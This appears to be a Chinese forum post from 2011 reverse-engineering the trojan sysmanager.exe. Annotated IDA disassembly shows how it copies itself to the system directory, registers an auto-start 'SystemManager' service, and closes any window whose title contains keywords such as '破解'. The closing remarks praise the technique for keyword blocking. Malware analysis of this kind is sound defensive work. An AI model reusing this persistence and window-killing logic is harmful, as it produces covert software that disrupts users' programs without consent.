sysmanager.exe逆向分析

作 者: 古越魂
時 間: 2011-07-15,20:23:50

這幾天不知道為啥子電腦速度特別慢，而且有些網頁打開後就直接將瀏覽器關閉了，搞得我很鬱悶.用殺毒軟件查殺，結果啥都沒查出來...於是很糾結，還是手動殺毒比較靠譜...因為這些網頁打開的都有些破解，逆向等字眼，所以就懷疑它是根據關鍵字來進行工作的，於是新建了一個“逆向破解.txt”，用記事本打開，果然：一打開它就關閉了，換editplus打開，結果還是一樣，而換了文件名打開就正常了.
      因為對於每個進程都會產生這種情況，所以初步懷疑是dll注入，可對照兩個進程的dll，除了系統的dll，貌似也沒啥子問題，而注入系統dll的可能性不大，所以還是另尋他法吧。
     將電腦在安全模式下打開，觀察進程列表，然後電腦正常模式下打開，觀察進程列表，然後再進行一個一個排除。
      經過反复的測試，確定是sysmanager.exe文件的問題，關閉進程，結果能正常運行。結果百度了下該進程，果然是個病毒木馬程序，然後清理註冊表，刪除程序，ok，殺毒完畢！ ！ ！
     本來到這裡都應該結束了，但是一時也沒啥事幹，而且這東西搞得我鬱悶無比！ ！ ！所以還是決定分析下。
    PEiD查殼：Microsoft Visual C++ 6.0
    這是一個好消息，接著就IDA + OD進行分析吧.

代碼:
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
.text:004014F0 _WinMain@16 proc near ; CODE XREF: start+12Fp
.text:004014F0
.text:004014F0 ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -10h
.text:004014F0 var_8 = dword ptr -8
.text:004014F0 var_4 = dword ptr -4
.text:004014F0 hInstance = dword ptr 4
.text:004014F0 hPrevInstance = dword ptr 8
.text:004014F0 Str1 = dword ptr 0Ch
.text:004014F0 nShowCmd = dword ptr 10h
.text:004014F0
.text:004014F0 sub esp, 10h
.text:004014F3 call sub_401000
.text:004014F8 call ds:GetCurrentThreadId
.text:004014FE mov dword_403068, eax
.text:00401503 xor eax, eax
.text:00401505 mov [esp+10h+var_8], eax
.text:00401509 mov [esp+10h+var_4], eax
.text:0040150D mov eax, [esp+10h+Str1]
//判斷是否為刪除指令，如果是，那麼刪除服務，卸載程序
.text:00401511 push offset Str2 ; "/uninstall"
.text:00401516 push eax ; Str1
.text:00401517 mov [esp+18h+ServiceStartTable.lpServiceName], offset ServiceName ; "SystemManager"
.text:0040151F mov [esp+18h+ServiceStartTable.lpServiceProc], offset loc_401450
.text:00401527 call ds:_stricmp
.text:0040152D add esp, 8
.text:00401530 test eax, eax
.text:00401532 jnz short loc_401541
.text:00401534 call sub_401220
.text:00401539 x​​or eax, eax
.text:0040153B add esp, 10h
.text:0040153E retn 10h
.text:00401541 ; --------------------------------------------- ------------------------------
.text:00401541
.text:00401541 loc_401541: ; CODE XREF: WinMain(x,x,x,x)+42j
.text:00401541 call sub_401040
.text:00401546 lea ecx, [esp+10h+ServiceStartTable]
//函數StartServiceCtrlDispatcherA的利用
//對於每一個新建的進程，創建一個線程，進行檢測操作
.text:0040154A push ecx ; lpServiceStartTable
.text:0040154B call ds:StartServiceCtrlDispatcherA
.text:00401551 xor eax, eax
.text:00401553 add esp, 10h
.text:00401556 retn 10h
.text:00401556 _WinMain@16 endp



typedef struct _SERVICE_TABLE_ENTRY {
  LPTSTR lpServiceName;
  LPSERVICE_MAIN_FUNCTION lpServiceProc;
} SERVICE_TABLE_ENTRY,
lpServiceProc = 401450


//將sysmanager.exe複製到系統目錄，並創建啟動服務
.text:00401040 sub esp, 220h
.text:00401046 lea eax, [esp+220h+NewFileName]
.text:0040104A push ebx
.text:0040104B push esi
.text:0040104C push edi
.text:0040104D push 100h ; uSize
.text:00401052 push eax ; lpBuffer
.text:00401053 call ds:GetSystemDirectoryA
.text:00401059 mov edi, offset aSysmanager_exe ; "\\sysmanager.exe"
.text:0040105E or ecx, 0FFFFFFFFh
.text:00401061 xor eax, eax
.text:00401063 lea edx, [esp+22Ch+NewFileName]
.text:00401067 repne scasb
.text:00401069 not ecx
.text:0040106B sub edi, ecx
.text:0040106D push 104h ; nSize
.text:00401072 mov esi, edi
.text:00401074 mov ebx, ecx
.text:00401076 mov edi, edx
.text:00401078 or ecx, 0FFFFFFFFh
.text:0040107B repne scasb
.text:0040107D mov ecx, ebx
.text:0040107F dec edi
.text:00401080 shr ecx, 2
.text:00401083 rep movsd
.text:00401085 mov ecx, ebx
.text:00401087 lea eax, [esp+230h+ExistingFileName]
.text:0040108E and ecx, 3
.text:00401091 push eax ; lpFilename
.text:00401092 rep movsb
.text:00401094 push 0 ; hModule
//獲取自身程序名
.text:00401096 call ds:GetModuleFileNameA
.text:0040109C lea ecx, [esp+22Ch+NewFileName]
.text:004010A0 push 0 ; bFailIfExists
.text:004010A2 lea edx, [esp+230h+ExistingFileName]
.text:004010A9 push ecx ; lpNewFileName
.text:004010AA push edx ; lpExistingFileName
//複製文件
.text:004010AB call ds:CopyFileA
.text:004010B1 test eax, eax
.text:004010B3 jnz short loc_4010BF
.text:004010B5 pop edi
.text:004010B6 pop esi
.text:004010B7 pop ebx
.text:004010B8 add esp, 220h
.text:004010BE retn
.text:004010BF ; --------------------------------------------- ------------------------------
.text:004010BF
.text:004010BF loc_4010BF: ; CODE XREF: sub_401040+73j
.text:004010BF push 0F003Fh ; dwDesiredAccess
.text:004010C4 push 0 ; lpDatabaseName
.text:004010C6 push 0 ; lpMachineName
//打開服務管理
.text:004010C8 call ds:OpenSCManagerA
.text:004010CE test eax, eax
.text:004010D0 mov hSCObject, eax
.text:004010D5 jnz short loc_4010E1
.text:004010D7 pop edi
.text:004010D8 pop esi
.text:004010D9 pop ebx
.text:004010DA add esp, 220h
.text:004010E0 retn
.text:004010E1 ; --------------------------------------------- ------------------------------
.text:004010E1
.text:004010E1 loc_4010E1: ; CODE XREF: sub_401040+95j
.text:004010E1 push 0 ; lpPassword
.text:004010E3 push 0 ; lpServiceStartName
.text:004010E5 push offset Dependencies ; lpDependencies
.text:004010EA push 0 ; lpdwTagId
.text:004010EC lea ecx, [esp+23Ch+NewFileName]
.text:004010F0 push 0 ; lpLoadOrderGroup
.text:004010F2 push ecx ; lpBinaryPathName
.text:004010F3 mov ebx, 2
.text:004010F8 push 1 ; dwErrorControl
.text:004010FA push ebx ; dwStartType
.text:004010FB push 110h ; dwServiceType
.text:00401100 push 0F01FFh ; dwDesiredAccess
.text:00401105 push offset ServiceName ; "SystemManager"
.text:0040110A push offset ServiceName ; "SystemManager"
.text:0040110F push eax ; hSCManage
//創建服務
.text:00401110 call ds:CreateServiceA
.text:00401116 mo​​v esi, ds:GetLastError
.text:0040111C mov dword_403060, eax
.text:00401121 test eax, eax
.text:00401123 jnz short loc_40117C
.text:00401125 call esi ; GetLastError
.text:00401127 cmp eax, 431h
.text:0040112C jz short loc_401147
.text:0040112E mov edx, hSCObject
.text:00401134 push edx ; hSCObject
.text:00401135 call ds:CloseServiceHandle
.text:0040113B pop edi
.text:0040113C pop esi
.text:0040113D xor eax, eax
.text:0040113F pop ebx
.text:00401140 add esp, 220h
.text:00401146 retn
.text:00401147 ; --------------------------------------------- ------------------------------
.text:00401147
.text:00401147 loc_401147: ; CODE XREF: sub_401040+ECj
.text:00401147 mov eax, hSCObject
.text:0040114C push 10h ; dwDesiredAccess
.text:0040114E push offset ServiceName ; "SystemManager"
.text:00401153 push eax ; hSCManager
//打開服務
.text:00401154 call ds:OpenServiceA
.text:0040115A test eax, eax
.text:0040115C mov dword_403060, eax
.text:00401161 jnz short loc_40117C
.text:00401163 mov ecx, hSCObject
.text:00401169 push ecx ; hSCObject
.text:0040116A call ds:CloseServiceHandle
.text:00401170 pop edi
.text:00401171 pop esi
.text:00401172 xor eax, eax
.text:00401174 pop ebx
.text:00401175 add esp, 220h
.text:0040117B retn


//刪除服務
sub_401220 proc near ; CODE XREF: WinMain(x,x,x,x)+44p
.text:00401220 push esi
.text:00401221 push 0F003Fh ; dwDesiredAccess
.text:00401226 push 0 ; lpDatabaseName
.text:00401228 push 0 ; lpMachineName
.text:0040122A call ds:OpenSCManagerA
.text:00401230 test eax, eax
.text:00401232 mov hSCObject, eax
.text:00401237 jz loc_4012C3
.text:0040123D push 0F01FFh ; dwDesiredAccess
.text:00401242 push offset ServiceName ; "SystemManager"
.text:00401247 push eax ; hSCManager
.text:00401248 call ds:OpenServiceA
.text:0040124E test eax, eax
.text:00401250 mov dword_403060, eax
.text:00401255 jz short loc_4012C3
.text:00401257 push offset ServiceStatus ; lpServiceStatus
.text:0040125C push eax ; hService
.text:0040125D call ds:QueryServiceStatus
.text:00401263 cmp ServiceStatus.dwCurrentState, 4
.text:0040126A jnz short loc_40127F
.text:0040126C mov eax, dword_403060
.text:00401271 push offset ServiceStatus ; lpServiceStatus
.text:00401276 push 1 ; dwControl
.text:00401278 push eax ; hService
.text:00401279 call ds:ControlService
.text:0040127F
.text:0040127F loc_40127F: ; CODE XREF: sub_401220+4Aj
.text:0040127F mov ecx, dword_403060
.text:00401285 push ecx ; hService
.text:00401286 call ds:DeleteService
.text:0040128C test eax, eax
.text:0040128E jz short loc_4012AB
.text:00401290 mov edx, hSCObject
.text:00401296 mov esi, ds:CloseServiceHandle
.text:0040129C push edx ; hSCObject
.text:0040129D call esi ; CloseServiceHandle
.text:0040129F mov eax, dword_403060
.text:004012A4 push eax ; hSCObject
.text:004012A5 call esi ; CloseServiceHandle
.text:004012A7 xor eax, eax
.text:004012A9 pop esi
.text:004012AA retn



xt:00401450 loc_401450: ; DATA XREF: WinMain(x,x,x,x)+2Fo
.text:00401450 push offset sub_4012D0
.text:00401455 push offset ServiceName ; "SystemManager"
.text:0040145A mov ServiceStatus.dwCurrentState, 2
.text:00401464 mov ServiceStatus.dwControlsAccepted, 3
.text:0040146E call ds:RegisterServiceCtrlHandlerA
.text:00401474 test eax, eax
.text:00401476 mov hServiceStatus, eax
.text:0040147B jz short locret_4014E4
.text:0040147D push esi
.text:0040147E mov esi, ds:SetServiceStatus
.text:00401484 push offset ServiceStatus
.text:00401489 push eax
.text:0040148A call esi ; SetServiceStatus
.text:0040148C mov eax, hServiceStatus
.text:00401491 push offset ServiceStatus
.text:00401496 push eax
.text:00401497
.text:00401497 __cfltcvt_init:
.text:00401497 mov ServiceStatus.dwWin32ExitCode, 0
.text:004014A1 mov ServiceStatus.dwCheckPoint, 0
.text:004014AB mov ServiceStatus.dwWaitHint, 0
.text:004014B5 mov ServiceStatus.dwCurrentState, 4
.text:004014BF call esi ; SetServiceStatus
.text:004014C1 push 0
.text:004014C3 push 0
.text:004014C5 push 0
.text:004014C7 push offset sub_401380
.text:004014CC push 0
.text:004014CE push 0
.text:004014D0 call ds:CreateThread
.text:004014D6 test eax, eax
.text:004014D8 pop esi
.text:004014D9 jz short locret_4014E4
.text:004014DB push 0FFFFFFFFh
.text:004014DD push eax
.text:004014DE call ds:WaitForSingleObject
.text:004014E4
.text:004014E4 locret_4014E4: ; CODE XREF: .text:0040147Bj
.text:004014E4 ; .text:004014D9j
.text:004014E4 retn


對於每個新建的進程，都創建一個線程，線程函數地址：sub_401380

sub_401380 proc near ; DATA XREF: .text:004014C7o
.text:00401380
.text:00401380 String = byte ptr -104h
.text:00401380
.text:00401380 sub esp, 104h
.text:00401386 push ebx
.text:00401387 mov ebx, ds:_mbsstr
.text:0040138D push esi
.text:0040138E push edi
.text:0040138F
.text:0040138F loc_40138F: ; CODE XREF: sub_401380+47j
.text:0040138F ; sub_401380+BEj
.text:0040138F push 3E8h ; dwMilliseconds
.text:00401394 call ds:Sleep
.text:0040139A xor eax, eax
.text:0040139C mov ecx, 19h
.text:004013A1 mov edi, offset dword_403094
.text:004013A6 push eax ; lParam
.text:004013A7 rep stosd
.text:004013A9 push offset EnumFunc ; lpEnumFunc
.text:004013AE mov dword_403224, 0
.text:004013B8 call ds:EnumWindows //枚舉窗口
.text:004013BE mov eax, dword_403224
.text:004013C3 xor edi, edi
.text:004013C5 test eax, eax
.text:004013C7 jle short loc_40138F
.text:004013C9 mov esi, offset dword_403094
.text:004013CE
.text:004013CE loc_4013CE: ; CODE XREF: sub_401380+BCj
.text:004013CE mov eax, [esi]
.text:004013D0 test eax, eax
.text:004013D2 jz short loc_401431
.text:004013D4 lea ecx, [esp+110h+String]
.text:004013D8 push 80h ; nMaxCount
.text:004013DD push ecx ; lpString
.text:004013DE push eax ; hWnd
.text:004013DF call ds:GetWindowTextA //獲取窗口文本
.text:004013E5 test eax, eax
.text:004013E7 jz short loc_401431
.text:004013E9 lea edx, [esp+110h+String]
.text:004013ED push offset unk_403040
.text:004013F2 push edx
.text:004013F3 call ebx ; _mbsstr
.text:004013F5 add esp, 8
.text:004013F8 test eax, eax
.text:004013FA jnz short loc_401422
.text:004013FC lea eax, [esp+110h+String]
.text:00401400 push offset aI ; "專用"
.text:00401405 push eax
.text:00401406 call ebx ; _mbsstr //檢測關鍵字：專用
.text:00401408 add esp, 8
.text:0040140B test eax, eax
.text:0040140D jnz short loc_401422
.text:0040140F lea ecx, [esp+110h+String]
.text:00401413 push offset aT ; "破解"
.text:00401418 push ecx
.text:00401419 call ebx ; _mbsstr //檢測關鍵字:破解
.text:0040141B add esp, 8
.text:0040141E test eax, eax
.text:00401420 jz short loc_401431
.text:00401422
.text:00401422 loc_401422: ; CODE XREF: sub_401380+7Aj
.text:00401422 ; sub_401380+8Dj
.text:00401422 mov edx, [esi]
.text:00401424 push 0 ; lParam
.text:00401426 push 0 ; wParam
.text:00401428 push 10h ; Msg
.text:0040142A push edx ; hWnd
.text:0040142B call ds:SendMessageA //發送消息，關閉進程
.text:00401431
.text:00401431 loc_401431: ; CODE XREF: sub_401380+52j
.text:00401431 ; sub_401380+67j ...
.text:00401431 mov eax, dword_403224
.text:00401436 inc edi
.text:00401437 add esi, 4
.text:0040143A cmp edi, eax
.text:0040143C jl short loc_4013CE
.text:0040143E jmp loc_40138F
.text:0040143E sub_401380 endp
一些感觸：
到這裡就分析完畢了，終於知道啥原因了，同時也學了個函數StartServiceCtrlDispatcherA，這是一個好函數，用來做文件監控真是再好不過了，而且可以對一些關鍵字進行過濾，假如：有關破解逆向的網頁全部都被屏蔽掉了.好東西，學習了